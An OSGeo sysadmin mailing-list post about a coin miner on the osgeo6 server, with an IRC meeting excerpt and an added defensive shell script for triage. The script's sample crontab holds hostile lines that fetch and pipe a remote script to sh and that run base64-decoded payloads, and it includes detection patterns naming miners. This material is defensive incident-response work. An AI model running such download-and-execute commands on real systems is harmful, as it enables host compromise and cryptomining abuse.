[SAC] [OSGeo] #2162: OSGeo6 coin mining and other malware issues - investigate and mitigate

OSGeo trac_osgeo at osgeo.org
Sat May 12 06:56:44 PDT 2018

#2162: OSGeo6 coin mining and other malware issues - investigate and mitigate
 Reporter:  robe           |      Owner:  martin
     Type:  task           |     Status:  assigned
 Priority:  critical       |  Milestone:  Sysadmin Contract 2018-I
Component:  Systems Admin  |   Keywords:
 In last meeting we briefly discussed the issue of some sort of coin mining
 process going on under the geotools account which Markus Neteler spotted.

 Refer to list thread:



 and excerpts from last meeting transcript:

 20:03:04        robe2:  next topic - osgeo6 coin mining issue
 20:03:04        wildintellect:  we should probably start discussing the
 setup plan
 20:03:34        robe2:  wildintellect I'll add that to the end of agenda
 20:03:41        wildintellect:  so I'll note this isn't the 1st time we've
 caught a miner on an osgeo system
 20:03:47        robe2:  I think that might take a bit of discussion and
 flow into after party
 20:04:06        wildintellect:  martin found one once, I can't recall
 which machine, I think adhoc
 20:04:17        wildintellect:  that was clearly injected into a website
 20:04:49        markusN:        hi sorry for late
 20:05:04        robe2:  markusN I wasn't paying attention too closely were
 you saying j was running under geotools account?
 20:05:51        markusN:        np
 20:06:03        robe2:  np?
 20:07:08        robe2:  anyway can we disable geotools LDAP account or at
 very least remove from ldap_shell group?
 20:07:21        robe2:  ping strk you around?
 20:09:54        TemptorSent:    Check crontab entries.
 20:10:53        wildintellect:  there was a note that removing users from
 the ldap_shell group doesn't work
 20:10:54        TemptorSent:    Try to determine what the means of CnC is,
 because backdoors or reentry ports are common with such tools.
 20:11:08        markusN:        I'm still convinced of resetting all
 20:11:19        wildintellect:  TemptorSent, do you have access to that
 machine to poke around?
 20:11:31        TemptorSent:    No idea, and I'd rather not try.
 20:12:03        markusN:        (and I'm in Germany with totally crappy
 mobile connection... on and off)
 20:12:05        TemptorSent:    It's asking for a compromise of passwords.
 20:12:26        markusN:        mhh
 20:12:27        TemptorSent:    Anyone logging in with a password should
 subsequently reset their passwords.
 20:12:45        wildintellect:  ya that's part of the greater need to move
 to key based
 20:12:57        TemptorSent:    Trojaning SSH is a time-honored
 20:13:01        wildintellect:  Martin will have a way to key based login
 as root
 20:13:06        wildintellect:  I believe I have that too
 20:13:10        robe2:  TemptorSent didn't see any jobs running under
 geotools account
 20:13:14        wildintellect:  so I could add more keys
 20:13:15        robe2:  that was first thing I checked
 20:13:47        TemptorSent:    depending on how good the hacker/kit,
 they may be cloaked as 'nobody' even.
 20:14:18        TemptorSent:    A good trick is to pick the name of a
 running process, clone it, and restart yourself periodically.
 20:14:49        robe2:  wildintellect you know if Martin has used up his
 contract yet?
 20:14:59        TemptorSent:    To be honest, I wouldn't trust much of
 anything without having proper logs and an audit list to check against.
 20:15:01        robe2:  or can we assign him to look into this issue
 20:15:02        wildintellect:  no idea, strk was overseeing that
 20:15:20        robe2:  and strk appears to be asleep :)
 20:15:57        robe2:  as I recall I think we asked Martin in last
 meeting and he said he still had time but got tied up with other
 emergencies in past 2 weeks or so
 20:16:09        robe2:  he was going to start putting in more time this
 coming week.

Ticket URL: <https://trac.osgeo.org/osgeo/ticket/2162>
OSGeo <http://www.osgeo.org/>
OSGeo committee and general foundation issue tracker.

More information about the Sac mailing list
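The transcript above suggests three concrete host checks for a suspected miner: look at crontab entries, look for processes cloaked under the name of a legitimate daemon (or running as 'nobody' from a deleted binary), and work out what the means of command-and-control is. The following helpers are an added example written for this page; they are not OSGeo tooling and were not run on osgeo6. Each one reads a listing on stdin so it can be pointed at live output or at evidence copied off the box, and the sample process list, crontabs and socket table at the bottom are constructed here purely to exercise the checks (the addresses are RFC 5737 documentation ranges). The `/proc`, `crontab -l -u` and `ss` one-liners in the comments are the assumed way to produce that input on a Linux host.

```shell
#!/bin/sh
# Hypothetical triage helpers for the checks raised in the SAC transcript.
# Added example, not OSGeo's own tooling. Every helper reads its listing on
# stdin so it works on live output or on saved evidence alike.

# --- 1. Processes whose reported name does not match their binary --------
# Input lines: "PID COMM EXE", e.g. built on a live host with
#   for p in /proc/[0-9]*; do printf '%s %s %s\n' "${p#/proc/}" \
#     "$(cat "$p/comm")" "$(readlink "$p/exe" 2>/dev/null)"; done
# Kernel threads have no exe and are skipped. /proc/PID/comm is truncated
# to 15 characters, so the basename is truncated the same way before comparing.
find_cloaked() {
    while read -r pid comm exe; do
        if [ -z "$exe" ]; then
            continue
        fi
        case "$exe" in
            *"(deleted)")   # binary unlinked after start: common miner hygiene
                echo "$pid $comm $exe"
                continue ;;
        esac
        base=${exe##*/}
        if [ "$comm" != "$(printf '%.15s' "$base")" ]; then
            echo "$pid $comm $exe"
        fi
    done
}

# --- 2. Crontab lines that download-and-run, decode payloads, or execute
#        from temp directories ------------------------------------------
# Input: crontab text, optionally prefixed "user: " per line, e.g.
#   for u in $(cut -d: -f1 /etc/passwd); do
#     crontab -l -u "$u" 2>/dev/null | sed "s/^/$u: /"; done; cat /etc/cron.d/*
# Comment and blank lines are dropped first. The pattern list is a starting
# heuristic, not a complete signature set.
find_suspicious_cron() {
    grep -E -v '^([^:[:space:]]+:[[:space:]]*)?(#|$)' |
    grep -E -i '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|/(tmp|dev/shm|var/tmp)/|xmrig|minerd|stratum[+]tcp' || true
}

# --- 3. Established TCP sessions to ports commonly used by stratum mining
#        pools (heuristic; 4444 is also a generic reverse-shell port) ------
# Input lines: "LOCAL REMOTE PROCESS", e.g. roughly from
#   ss -Htnp state established | awk '{print $3, $4, $5}'
find_pool_connections() {
    while read -r local remote proc; do
        case "${remote##*:}" in
            3333|4444|5555|7777|14444) echo "$remote $proc" ;;
        esac
    done
}

# --- Constructed sample evidence (not from the osgeo6 host) ---------------
SAMPLE_PROCS='1 systemd /usr/lib/systemd/systemd
1234 sshd /usr/sbin/sshd
4321 sshd /tmp/.x/xmrig
5555 kworker/0:1
6789 java /usr/lib/jvm/java-8-openjdk-amd64/bin/java
7000 nobody /dev/shm/.a/nobody (deleted)'

SAMPLE_CRON='geotools: # m h dom mon dow command
geotools: */5 * * * * curl -fsSL http://203.0.113.10/x.sh | sh
geotools: @reboot /dev/shm/.x/run >/dev/null 2>&1
root: 0 3 * * * /usr/bin/certbot renew --quiet
www-data: * * * * * echo L3RtcC8ueC9ydW4= | base64 -d | sh'

SAMPLE_CONNS='10.0.0.6:22 198.51.100.7:51234 sshd
10.0.0.6:44022 203.0.113.10:3333 sshd
10.0.0.6:8080 198.51.100.9:55555 java'

triage_procs() { printf '%s\n' "$SAMPLE_PROCS" | find_cloaked; }
triage_cron()  { printf '%s\n' "$SAMPLE_CRON"  | find_suspicious_cron; }
triage_conns() { printf '%s\n' "$SAMPLE_CONNS" | find_pool_connections; }

echo "== cloaked or deleted-binary processes =="; triage_procs
echo "== suspicious cron entries ==";            triage_cron
echo "== sessions to pool ports ==";              triage_conns
```

On the sample data the process check reports the "sshd" that is really /tmp/.x/xmrig and the 'nobody' process whose binary has been deleted, the cron check reports the curl-pipe-to-sh, /dev/shm and base64 entries but not the legitimate certbot job, and the socket check reports the one session to port 3333. None of this replaces the point made in the transcript about logs and an audit baseline: a rootkit that hides from /proc defeats check 1, so results from a suspect host should be compared against package-manager verification (dpkg -V / rpm -V) or an offline image before anything is trusted.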